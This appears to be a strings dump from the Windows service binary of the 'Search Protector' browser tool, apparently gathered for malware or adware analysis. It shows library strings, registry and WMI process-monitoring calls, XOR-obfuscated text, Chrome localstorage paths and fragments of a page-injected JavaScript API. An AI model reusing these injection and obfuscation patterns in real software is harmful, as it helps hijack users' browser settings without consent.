too many attached databases - max %d

unable to open database: %s

no such database: %s

database %s is locked

sqlite_detach

cannot detach database %s

access to %s.%s.%s is prohibited

sqlite_attach

%s %T cannot reference objects in database %s

access to %s.%s is prohibited

object name reserved for internal use: %s

too many columns on %s

duplicate column name: %s

there is already an index named %s

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

default value of column [%s] is not constant

table "%s" has more than one primary key

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

view %s is circularly defined

CREATE TABLE %Q.sqlite_sequence(name,seq)

DELETE FROM %Q.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

sqlite_stat%d

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

sqlite_stat

table %s may not be dropped

unknown column "%s" in foreign key definition

indexed columns are not unique

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

table %s may not be indexed

views may not be indexed

index %s already exists

sqlite_autoindex_%s_%d

virtual tables may not be indexed

there is already a table named %s

table %s has no column named %s

no such index: %S

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q AND type='index'

a JOIN clause is required before %s

unable to identify the object to be reindexed

no such collation sequence: %s

table %s may not be modified

cannot modify %s because it is a view

sqlite_version

sqlite_source_id

sqlite_compileoption_get

sqlite_log

sqlite_compileoption_used

foreign key mismatch - "%w" referencing "%w"

%d values for %d columns

table %S has no column named %s

table %S has %d columns but %d values were supplied

constraint %s failed

PRIMARY KEY must be unique

%s.%s may not be NULL

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

sqlite3_extension_init

error during initialization: %s

automatic extension loading failed: %s

foreign_keys

foreign_key_list

foreign_key_check

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

%s - %s

database schema is locked: %s

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

unknown or unsupported join type: %T %T%s%T

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

USE TEMP B-TREE FOR %s

%s.%s

%s:%d

COMPOUND SUBQUERIES %d AND %d %s(%s)

SELECTs to the left and right of %s do not have the same number of result columns

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

too many references to "%s": max 65535

%s.%s.%s

no such index: %s

sqlite_subquery_%p_

no such table: %s

SCAN TABLE %s %s%s(~%d rows)

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

no such trigger: %S

-- TRIGGER %s

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such column: %s

PRAGMA vacuum_db.synchronous=OFF

cannot VACUUM - SQL statements in progress

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

vtable constructor failed: %s

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

no such module: %s

vtable constructor did not declare schema: %s

table %s: xBestIndex returned an invalid plan

%s TABLE %s

%s AS %s

%s SUBQUERY %d

%s USING %s%sINDEX%s%s%s

%s USING INTEGER PRIMARY KEY

%s (rowid>?)

%s (rowid%s (rowid=?)
%s (rowid>? AND rowidat most %d tables in a join
cannot use index: %s
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
cannot open file at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
{{{$705}}}
{{{$703}}}
{{{$704}}}
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\SearchProtector\Dev\2.16.10\Output\Release_32\CltMngSvc.pdb
WTSAPI32.dll
USERENV.dll
KERNEL32.dll
USER32.dll
ReportEventW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
I_RpcBindingInqTransportType
RPCRT4.dll
PSAPI.DLL
VERSION.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoA
WININET.dll
CryptMsgClose
CertGetNameStringW
CertFreeCertificateContext
CertFindCertificateInStore
CertCloseStore
CryptMsgGetParam
CRYPT32.dll
dbghelp.dll
GetCPInfo
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegNotifyChangeKeyValue
ReportEventA
zcÁ
C:\PROGRA~1\SearchProtect\
;74/, (%#
~{xrpfa\ZSM@;3-%U
function k(a) { return a < 10 ? "0"   a : a } function o(a) { p.lastIndex = 0; return p.test(a) ? '"'   a.replace(p, function (a) { var c = r[a]; return typeof c === "string" ? c : "\\u"   ("0000"   a.charCodeAt(0).toString(16)).slice(-4) })   '"' : '"'   a   '"' } function l(a, j) {
var c, d, h, m, g = e, f, b = j[a]; b && typeof b === "object" && typeof b.toJSON === "function" && (b = b.toJSON(a)); typeof i === "function" && (b = i.call(j, a, b)); switch (typeof b) {
e  = n; f = []; if (Object.prototype.toString.apply(b) === "[object Array]") { m = b.length; for (c = 0; c < m; c  = 1) f[c] = l(c, b) || "null"; h = f.length === 0 ? "[]" : e ? "[\n"   e   f.join(",\n"   e)   "\n"   g   "]" : "["   f.join(",")   "]"; e = g; return h } if (i && typeof i === "object") { m = i.length; for (c = 0; c < m; c  = 1) typeof i[c] === "string" && (d = i[c], (h = l(d, b)) && f.push(o(d)   (e ? ": " : ":")   h)) } else for (d in b) Object.prototype.hasOwnProperty.call(b, d) && (h = l(d, b)) && f.push(o(d)   (e ? ": " : ":")   h); h = f.length === 0 ? "{}" : e ? "{\n"   e   f.join(",\n"   e)   "\n"   g   "}" : "{"   f.join(",")  
} if (typeof Date.prototype.toJSON !== "function") Date.prototype.toJSON = function () { return isFinite(this.valueOf()) ? this.getUTCFullYear()   "-"   k(this.getUTCMonth()   1)   "-"   k(this.getUTCDate())   "T"   k(this.getUTCHours())   ":"   k(this.getUTCMinutes())   ":"   k(this.getUTCSeconds())   "Z" : null }, String.prototype.toJSON = Number.prototype.toJSON = Boolean.prototype.toJSON = function () { return this.valueOf() }; var q = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
p = /[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g, e, n, r = { "\u0008": "\\b", "\t": "\\t", "\n": "\\n", "\u000c": "\\f", "\r": "\\r", '"': '\\"', "\\": "\\\\" }, i; if (typeof JSON.stringify !== "function") JSON.stringify = function (a, j, c) {
var d; n = e = ""; if (typeof c === "number") for (d = 0; d < c; d  = 1) n  = " "; else typeof c === "string" && (n = c); if ((i = j) && typeof j !== "function" && (typeof j !== "object" || typeof j.length !== "number")) throw Error("JSON.stringify"); return l("",
}; if (typeof JSON.parse !== "function") JSON.parse = function (a, e) {
function c(a, d) { var g, f, b = a[d]; if (b && typeof b === "object") for (g in b) Object.prototype.hasOwnProperty.call(b, g) && (f = c(b, g), f !== void 0 ? b[g] = f : delete b[g]); return e.call(a, d, b) } var d, a = String(a); q.lastIndex = 0; q.test(a) && (a = a.replace(q, function (a) { return "\\u"   ("0000"   a.charCodeAt(0).toString(16)).slice(-4) })); if (/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, "@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g,
"]").replace(/(?:^|:|,)(?:\s*\[) /g, ""))) return d = eval("("   a   ")"), typeof e === "function" ? c({ "": d }, "") : d; throw new SyntaxError("JSON.parse");
ws.api = ws.api || {};
ws.api.FunctionsEnum = {
SET_KEY: 1,
GET_KEY: 2,
REMOVE_KEY: 3,
ws.api.StatusEnum = {
SP_RESULT_KEY_DOES_NOT_EXIST: -2,
ws.api.RESULT_TIMOUET = 3000;
ws.api.storage = ws.api.storage || {};
ws.api.storage.setKey =
function (pluginId, key, value, callback, options) {
if (typeof (pluginId) !== 'string' || pluginId === "" || typeof (key) !== 'string' || key === "" || typeof (callback) !== 'function') {
callback(ws.api.StatusEnum.SP_RESULT_INVALID_PARAMS);
// Construct an object which will be passed to the VC holding all the parameters
data.funcId = ws.api.FunctionsEnum.SET_KEY;
data.pluginId = pluginId;
data.key = key;
data.value = value;
data.options = options; // Currently not used - this is for future use, if we will want to add more parameters we will
var resultObj = JSON.parse(result);
callback(resultObj.status);
callback(ws.api.StatusEnum.SP_RESULT_SP_UNRESPONSIVE);
}, ws.api.RESULT_TIMOUET);
ws.internal.SendStringToVC(JSON.stringify(data), myCallback);
ws.api.storage.getKey =
function (pluginId, key, callback, options) {
data.funcId = ws.api.FunctionsEnum.GET_KEY;
var value = resultObj.value;
if (resultObj.status != ws.api.StatusEnum.SP_RESULT_SUCCESS) {
callback(resultObj.status, value);
callback(ws.api.StatusEnum.SP_RESULT_SP_UNRESPONSIVE, "");
ws.api.storage.removeKey =
data.funcId = ws.api.FunctionsEnum.REMOVE_KEY;
ws.api.system = ws.api.system || {};
ws.api.system.remove =
data.funcId = ws.api.FunctionsEnum.REMOVE;
data.shouldCallUninstaller = shouldCallUninstaller;
ws.internal = ws.internal || {};
if (ws.internal.injectedSP_PLUGIN_ID_SP_TASK_ID === undefined) {
ws.internal.injectedSP_PLUGIN_ID_SP_TASK_ID = true;
; ;$;(;,;0;4;8;<;
; ;$;(;,;0;4;
4%5x5
6$6-666d6k6t6}6
9 9$9(9,9094989<9@9[9
393U3o3
78u8
1-2
1 1$1(1,101
11C1R1a1p1
7t7C7R7a7p7
4 4$4(4,404
;&;6; <2<
1 2$2(2,202
1%1X1e1
253C3K3R3
2 2$2(2,2024282<2
< <$<(<,<0<4<8<<<
4 4$4(4,4044484
3)353:3^3
223F3i3~3
7 7;7@7_7
= =$=(=,=0=4=8=
7 7$7(7,7|7
4(5,5\5`5
?$?(?@?\?
>$>(>@>\>`>|>
14181\1`1
3 3(30383
? ?$?(?,?0?4?8?
0 0$0(0,0004080<0
2 2$2(2,20242
6$6,646<6
hmscoree.dll
Vkernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
8.0.0.0-11.999.999.999
33.0.0.0-36.999.999.999
16.0.0.0-31.999.999.999
Failed to execute installer :
SPSetup.exe
}{{{$663}}}
{{{$664}}}
{{{$665}}}
}{{{$666}}}
{{{$663}}}
{{{$666}}}
%s (Error: %d)
{{{SP#Conduit::SearchProtector::Service::ServiceBase::ReportEventW#SP}}}
*.dmp
{{{$1053}}}
}{{{$665}}}
{{{$1120}}}
{{{$1121}}}
}WindowsSessionManagerThread
2.16.10.61
UIRepository.dat
UserRepository.dat
SystemRepository.dat
{{{$607}}}
 {{{$665}}}
36.0.0.0
{{{$291}}}
{{{$290}}}
{{{$294}}}
{{{$293}}}
{{{$297}}}
{{{$296}}}
Failed to set Url
{{{$303}}}
{{{$307}}}
{{{$304}}}
{{{$305}}}
{{{$306}}}
{{{$310}}}
{{{$309}}}
{{{$317}}}
{{{$316}}}
{{{$322}}}
{{{$321}}}
{{{$325}}}
{{{$330}}}
{{{$329}}}
{{{$333}}}
{{{$332}}}
{{{$345}}}
{{{$344}}}
{{{$350}}}
{{{$351}}}
{{{$355}}}
{{{$354}}}
chrome-extension_
;{{{$252}}}
_0.localstorage
{{{$251}}}
{{{$254}}}
;{{{$666}}}
{{{$255}}}
32.0.0.0
{{{$380}}}
{{{$381}}}
{{{$378}}}
{{{$366}}}
{{{$367}}}
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_PERFORMANCE_NLSTEXT
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_DYN_DATA
HKEY_CURRENT_USER_LOCAL_SETTINGS
HKEY_CURRENT_CONFIG
{{{$707}}}
user32.dll
ieframe.dll
Windows Server 2008
Windows 7
Windows Vista
Windows 8.1
Windows Server 2012
Windows 8
Windows Server 2008 R2
%x %x[%s] %I64x %x %x
{{{$697}}}
{{{$698}}}
SELECT * FROM __InstanceCreationEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
SELECT * FROM __InstanceDeletionEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
yntdll.dll
%s%s%s
Correct password required
{{{SP#Conduit::SearchProtector::Utils::WMIAgentJob::Join#SP}}}
{{{$715}}}
888816666554443
6666554443
!6666554443
{{{$369}}}
{{{$368}}}
{{{$370}}}
{{{$625}}}
HIDispatch error #%d
IWindowsSessionManagerException
01234567
RpcTransportException
N8.0.0.0-11.999.999.999
Kernel32.dll
C:\PROGRA~1\SearchProtect\Main\bin\CltMngSvc.exe

cltmng.exe_996:


.text
`.rdata
@.data
.rsrc
@.reloc
.EKSWU
\$$;\$0|
DlSHA512 block transform for x86, CRYPTOGAMS by 
Camellia for x86 by 
AES for Intel AES-NI, CRYPTOGAMS by 
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by 
RC4 for x86, CRYPTOGAMS by 
Montgomery Multiplication for x86, CRYPTOGAMS by 
SHA1 block transform for x86, CRYPTOGAMS by 
SHA256 block transform for x86, CRYPTOGAMS by 
GHASH for x86, CRYPTOGAMS by 
GF(2^m) Multiplication for x86, CRYPTOGAMS by 
FtPS
[email protected]
t;j.Yf
j.Xf9
!\$0!\$4
<1%u5
FTPj
tCPQ
,4,56,789
PSSSSSSh
 FTPj
F\ FTP
j.Yf;
_tcPVj@
.PjRW
r%f;M
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
kernel32.dll
boost::filesystem::directory_iterator::operator  
The repeat operator "*" cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator " " cannot start a regular expression.
Found a closing repetition operator } with no corresponding {.
Can't terminate a sub-expression with an alternation operator |.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
A regular expression can start with the alternation operator |.
Invalid alternation operators within (?...) block.
More than one alternation operator | was encountered inside a conditional expression.
Alternation operators are not allowed inside a DEFINE block.
A repetition operator cannot be applied to a zero-width assertion.
left-curly-bracket
right-curly-bracket
0123456789
Unmatched quantified repeat operator { or \{.
Invalid preceding regular expression prior to repetition operator.
boost thread: trying joining itself
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
PUBLIC KEY
RSA part of OpenSSL 1.0.1e 11 Feb 2013
SHA-512 part of OpenSSL 1.0.1e 11 Feb 2013
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
?456789:;<=
!"#$%&'()* ,-./0123
Big Number part of OpenSSL 1.0.1e 11 Feb 2013
pubkey
PEM part of OpenSSL 1.0.1e 11 Feb 2013
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
NETSCAPE_CERT_SEQUENCE
certs
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
DSA part of OpenSSL 1.0.1e 11 Feb 2013
priv_key
pub_key
.\crypto\ec\ec_key.c
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
Any Extended Key Usage
anyExtendedKeyUsage
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
%'%1%=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
RAND part of OpenSSL 1.0.1e 11 Feb 2013
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
lhash part of OpenSSL 1.0.1e 11 Feb 2013
Stack part of OpenSSL 1.0.1e 11 Feb 2013
Diffie-Hellman part of OpenSSL 1.0.1e 11 Feb 2013
value.single
value.set
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
EVP part of OpenSSL 1.0.1e 11 Feb 2013
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*s%s:
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
ASN.1 part of OpenSSL 1.0.1e 11 Feb 2013
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
AUTHORITY_KEYID
keyid
cert_info
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
EC part of OpenSSL 1.0.1e 11 Feb 2013
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
.\crypto\dh\dh_key.c
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
SHA1 part of OpenSSL 1.0.1e 11 Feb 2013
SHA-256 part of OpenSSL 1.0.1e 11 Feb 2013
RIPE-MD160 part of OpenSSL 1.0.1e 11 Feb 2013
SHA part of OpenSSL 1.0.1e 11 Feb 2013
MD5 part of OpenSSL 1.0.1e 11 Feb 2013
MD4 part of OpenSSL 1.0.1e 11 Feb 2013
AES part of OpenSSL 1.0.1e 11 Feb 2013
CAST part of OpenSSL 1.0.1e 11 Feb 2013
Blowfish part of OpenSSL 1.0.1e 11 Feb 2013
:RC2 part of OpenSSL 1.0.1e 11 Feb 2013
.pp@0
aEÐ
 (#EÚ
ÚE<<0
IDEA part of OpenSSL 1.0.1e 11 Feb 2013
libdes part of OpenSSL 1.0.1e 11 Feb 2013
DES part of OpenSSL 1.0.1e 11 Feb 2013
\X
ddddddZ
ddddddZ
%d.%d.%d.%d
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
%d.%d.%d.%d/%d.%d.%d.%d
X509_CERT_PAIR
X509_CERT_AUX
X.509 part of OpenSSL 1.0.1e 11 Feb 2013
x%s
%s - d:d:d%.*s %d%s
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
ECDSA part of OpenSSL 1.0.1e 11 Feb 2013
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
'() ,-./:=?
%lu:%s:%s:%d:%s
Verifying - %s
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
CONF part of OpenSSL 1.0.1e 11 Feb 2013
PROXY_CERT_INFO_EXTENSION
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
keylength
keyfunc
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
.\crypto\pkcs12\p12_key.c
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
CONF_def part of OpenSSL 1.0.1e 11 Feb 2013
[[%s]]
[%s] %s=%s
ECDH part of OpenSSL 1.0.1e 11 Feb 2013
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
%s.dll
%A%@%S%Q%W%J%S%L%B%J%
%F%J%H%
*F'F$FhF5F#F'F4F%F.FhF%F)F(F"F3F/F2FhF%F)F F
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\Boost\boost_1_55_0\boost/exception/detail/exception_ptr.hpp
{{{$626}}}
{{{$759}}}
{{{$760}}}
{{{$761}}}
{{{$762}}}
{{{$765}}}
{{{$766}}}
@7@!@)@4@
@4@!@ @%@/@6@%@2@
@%@6@%@.@4@
A%@%C%D%P%I%Q%v%@%D%W%F%M%
S6S%S6S!S'S6S7S
8U4U-UuU4U!U!U0U8U%U!U&UuU'U0U4U6U=U0U1U
(\=\7\9\3\*\9\.\
J%V%I%J%F%D%I%@%
{{{$461}}}
{{{$468}}}
{{{$471}}}
{{{$473}}}
_3_0_=_>_3_
_(_6_1_;_0_(_,_
_8_3_0_=_>_3_
_<_0_*_1_ _:_-_,_
S6S!S>S S.SuS
cCc%c
{{{$402}}}
{{{$403}}}
{{{$404}}}
{{{$405}}}
Z.Z#Z*Z?ZgZ}Z.Z?Z"Z.ZuZ2Z.Z7Z6Z}Z
{{{$406}}}
[([>[:[)[8[3[
[>[)[6[&[
{{{$408}}}
{{{$409}}}
{{{$410}}}
F5F#F'F4F%F.F6F*F3F!F/F(F5F
B0B.BbB6B;B2B'B
CREATE TABLE ItemTable (key TEXT UNIQUE ON CONFLICT REPLACE, value TEXT NOT NULL ON CONFLICT FAIL);
insert into ItemTable (key, value) VALUES ('%s', '%s');
PUADQ@%%h`qdv%V@Q%vu`flclfv8:4)%v`ws`wZvu`flclfv8:7%RM@W@%kjkZpkltp`Zkdh`%iln`%"mjh`udb`ZlvZk`rqdgudb`"%DKA%v`ws`wZkjkZpkltp`Zkdh`%%iln`%"mjh`udb`ZlvZk`rqdgudb`"
{{{$312}}}
{{{$313}}}
{{{$314}}}
{{{$334}}}
a!-dc}xyRhcnbidcj~!-~xjjh~yRx
U&U!U4U'U!U U%U
{{{$357}}}
{{{$358}}}
{{{$359}}}
{{{$360}}}
1d'd)d;d7d!dÖd'd,d;d0d!d6d)d
\/\/\9\(\
\StringFileInfo\xx\%s
(more frames truncated from call stack report)
Module %d
%d/%d/%d d:d:d
Image Base: 0xx Image Size: 0xx
File Size: %-10d File Time: %s
Checksum: 0xx Time Stamp: 0xx
Company: %s
FileDesc: %s
Product: %s
ProdVer: %d.%d.%d.%d
FileVer: %d.%d.%d.%d
Windows Server 2008
Windows Vista
Windows 7
Windows Server 2008 R2
Windows 8
Windows 9
Windows Server 2012
Web Edition
Windows Server 9
Windows XP
Windows 2000
(build %d)
This sample does not support this version of Windows.
Error occurred at %s.
Operating system: %s
%d processor(s), type %d.
Operating system: Could not Determine
%d%% memory in use.
%d MBytes paging file.
%d MBytes physical memory free.
%d MBytes user address space free.
%d MBytes user address space.
Web Server Edition
Windows Storage Server 2003
Windows Server 2003 R2
Windows XP Professional x64 Edition
Windows Home Server
Windows Server 2003
a Float Denormal Operand
%d MBytes paging file free.
a Float Invalid Operation
%d MBytes physical memory.
0xx:
EDI: 0xx ESI: 0xx EAX: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
%s\CRASH_REPORT_%s.txt
EFlags: 0xx ESP: 0xx SegSs: 0xx
%s caused %s (0xx)
in module %s at x:x.
%s location x caused an access violation.
%s\CRASH_DUMP_%s.dmp
===== [end of %s] =====
Error creating dump file, err=%d
Exception code is 0xX
Crash dump file: %s
Crash report file :%s
P%d_T%d_Dld_ld_ld_Tld_ld_ld
code: %x
code: %x, addr: %x, module: %s
{{{$629}}}
{{{$631}}}
{{{$630}}}
{{{$632}}}
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\google\gtest\gtest-1.6.0\include\gtest/internal/gtest-port.h
NtQueryKey
{{{$616}}}
{{{$615}}}
{{{$618}}}
{{{$617}}}
{{{$624}}}
{{{$623}}}
{{{$690}}}
{{{$692}}}
{{{$691}}}
{{{$693}}}
%s 0x%I64x %s [file:%s(%u)]
https://
ftp://
http://
[%u, 0xx] %s
wininet.dll
https
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
request HttpSendRequestA failed...
Content-Length: %u
response failed...last error %d
{{{$668}}}
{{{$669}}}
{{{$667}}}
{{{$770}}}
{{{$771}}}
{{{$768}}}
{{{$769}}}
